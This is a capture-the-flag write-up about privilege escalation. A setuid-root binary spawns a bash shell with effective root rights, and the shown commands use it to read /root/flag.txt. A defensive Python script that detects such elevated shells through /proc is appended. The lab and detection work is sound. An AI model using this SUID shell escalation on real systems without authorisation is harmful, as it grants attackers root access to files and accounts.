✨ Privesc - 1
👀 Before you start
You can donate to me via Buy Me a Coffee or follow me on Github
🚩 Getting the Flag
We're coming up against a challenge where we have to do just that:
level1@Midnight:~$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Mar 15 2024 .
drwxr-xr-x 3 root root 4096 Mar 15 2024 ..
-rwsr-xr-x 1 root level1 7320 Mar 15 2024 privesc1
We have a binary with the suid bit set (the s in -rwsr-xr-x); it is owned by root, and the level1 group can execute it.
level1@Midnight:~$ ./privesc1
level1@Midnight:~$
When we run it, nothing happens. This either means that the binary doesn't do anything, or that we're in a new shell.
Let's take a quick look:
level1@Midnight:~$ echo $$
888
level1@Midnight:~$ ./privesc1
level1@Midnight:~$ echo $$
5489
We now have a new shell. Let's see what kind of shell it is:
level1@Midnight:~$ id
uid=1001(level1) gid=1001(level1) euid=0(root) groups=0(root),1001(level1)
level1@Midnight:~$ echo $SHELL
/bin/bash
Okay, we've actually got a new bash with root rights. Now we can read the flag:
level1@Midnight:~$ ./privesc1 -p
level1@Midnight:~$ cat /root/flag.txt
MCTF{Pr1v1l3g3_3sc4l4t10n_1S_4lw4y5_4_B4d_1d34_4nd_4_B4d_3nv1r0nm3nt}
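The id output above is also what a defender would look for: a bash process whose real UID is still 1001 while its effective UID is 0. The following Python is an added example, not part of the original write-up, that flags such processes from the Uid line of /proc/<pid>/status; the list of shell names and the two sample status texts are constructed assumptions.

```python
import os

# Shell process names to watch for (assumption for this example; extend as needed).
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Constructed sample mirroring the write-up's id output (uid=1001, euid=0).
SAMPLE_ELEVATED = "Name:\tbash\nPid:\t5489\nUid:\t1001\t0\t0\t0\n"
# Constructed sample of an ordinary unprivileged shell.
SAMPLE_NORMAL = "Name:\tbash\nPid:\t888\nUid:\t1001\t1001\t1001\t1001\n"


def parse_status(text):
    """Turn the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def is_elevated_shell(status_text):
    """True for a shell whose effective UID is 0 while its real UID is not."""
    fields = parse_status(status_text)
    try:
        # The Uid line holds: real, effective, saved-set, filesystem UID.
        ruid, euid, _saved, _fs = (int(v) for v in fields["Uid"].split())
    except (KeyError, ValueError):
        return False  # truncated or malformed status: nothing to conclude
    return fields.get("Name") in SHELLS and euid == 0 and ruid != 0


def scan_proc(root="/proc"):
    """Return sorted PIDs under root whose status matches is_elevated_shell."""
    hits = []
    for entry in os.listdir(root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(root, entry, "status")) as fh:
                if is_elevated_shell(fh.read()):
                    hits.append(int(entry))
        except OSError:
            continue  # process exited or status not readable
    return sorted(hits)


if __name__ == "__main__":
    print(is_elevated_shell(SAMPLE_ELEVATED), is_elevated_shell(SAMPLE_NORMAL))
    if os.path.isdir("/proc"):
        print("elevated shells:", scan_proc())
```

A root login shell (all four UIDs 0) is deliberately not flagged; only the real/effective mismatch that a setuid launcher leaves behind is.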